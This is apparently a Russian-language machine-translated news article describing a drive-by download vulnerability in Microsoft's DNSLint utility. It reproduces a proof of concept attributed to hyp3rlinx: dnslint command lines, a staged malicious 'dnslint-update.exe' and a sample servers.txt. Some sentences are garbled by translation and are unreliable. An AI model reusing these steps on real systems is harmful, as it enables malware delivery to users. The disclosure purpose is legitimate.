Корпорация Майкрософт
Microsoft DNSLint Утилита предназначена для диагностики проблем поиска имен в системе доменных имен (DNS), связанных с IP-адресами, выделенными различным веб-серверам, доступ к которым осуществляется через браузер. Он не входит в базовый пакет Windows, но его можно бесплатно загрузить с веб-сайта Microsoft. Уязвимость удаленного доступа получила оценку 7,6 (критическая) на CVSS 3.0 Было обнаружено, что масштабирование влияет на эту утилиту, вызывая принудительную загрузку диска.
Уязвимость возникает из-за того, что DNSLint не проверяет доменные имена при парсинге тестовых файлов DNS в соответствии с параметром «/ ql». В случае, если конечному пользователю удастся использовать такой файл, который содержит сценарий или двоичный код, в отличие от обычно ожидаемой информации о доменном имени, система может быть подвергнута риску, когда становится легко инициировать принудительные загрузки. В этом случае хакер может инициировать принудительную загрузку вредоносного файла, который может загружать и выполнять удаленные команды при доступе через веб-браузер. Загрузка будет сохраняться в локальном системном расположении и запрашивать безопасный доступ, и, видя, что файл поступает из известного места на диске, пользователь может быть склонен разрешить выполнение исполняемого файла. После того как вредоносному файлу будет предоставлена привилегия, он сможет удаленно запустить любой предполагаемый код и поставить под угрозу безопасность и конфиденциальность пользователя.
Джон Пейдж из hyp3rlinx выписал доказательство концепции, моделирующей эту уязвимость, объясняя, что непреднамеренный файл может быть загружен в соответствии со следующими условиями, когда вместо имени домена используется сценарий или двоичный текстовый файл ссылки:
dnslint.exe / v / y / d «ВРЕДОНОСНЫЙ ФАЙЛ» / s X.X.X.X / r «myreport»
В контексте служебной программы DNSLint ниже показано, как можно использовать эту уязвимость для внедрения вредоносного ПО в систему.
1) «dnslint-update.exe» в корневом каталоге удаленного веб-сервера.
2) «servers.txt»
DNSLint
; Это пример входного файла DNSLint
+ Этот DNS-сервер называется: dns1.cp.msft.net
[DNS ~ сервер] X.X.X.X
, a, r; запись A
X.X.X.X, ptr, r; запись PTR
test1, cname, r; запись CNAME
test2, mx, r; запись MX
3) dnslint.exe / ql servers.txt
Приведенный выше код не был изменен, как указано в права hyp3rlinx к этому контенту. Раскрывая эту уязвимость, не похоже, что на данный момент есть какое-либо обновление для решения этой проблемы. Этой уязвимости еще предстоит присвоить код CVE, и он должен быть идентифицирован и написан Microsoft в своем официальном бюллетене по безопасности по этому поводу.